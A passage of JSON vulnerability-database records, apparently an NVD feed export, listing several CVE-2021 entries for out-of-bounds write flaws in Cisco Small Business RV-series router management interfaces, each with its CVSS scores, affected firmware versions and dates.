"description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1159", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1159"], "modified": "2021-01-19T19:44:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1159", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1159", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:16", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1212", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1212"], "modified": "2021-01-15T19:44:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1212", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1212", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:01", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1198", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1198"], "modified": "2021-01-15T19:48:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1198", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1198", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:12", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1208", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1208"], "modified": "2021-01-15T19:45:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1208", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1208", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:12", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1160", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1160"], "modified": "2021-01-19T19:44:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1160", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1160", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:57", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1195", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1195"], "modified": "2021-01-15T19:49:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1195", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1195", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:59", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1197", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1197"], "modified": "2021-01-15T19:48:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1197", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1197", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:27", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1173", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1173"], "modified": "2021-01-19T19:18:00", "cpe": ["cpe:/o:cisco:rv130w_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv130_vpn_router_firmware:1.3.1.7", "cpe:/o:cisco:rv130_vpn_router_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.3.1.7", "cpe:/o:cisco:rv130w_firmware:1.2.2.8", "cpe:/o:cisco:rv110w_firmware:1.2.2.8", "cpe:/a:cisco:application_extension_platform:1.0.3.55"], "id": "CVE-2021-1173", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1173", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv130w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130w_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:application_extension_platform:1.0.3.55:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv215w_wireless-n_vpn_router_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv130_vpn_router_firmware:1.2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv110w_firmware:1.2.2.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:47", "description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-13T22:15:00", "type": "cve", "title": "CVE-2021-1188", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1188"], "modified": "2021-01-15T19:54:00", "cpe": 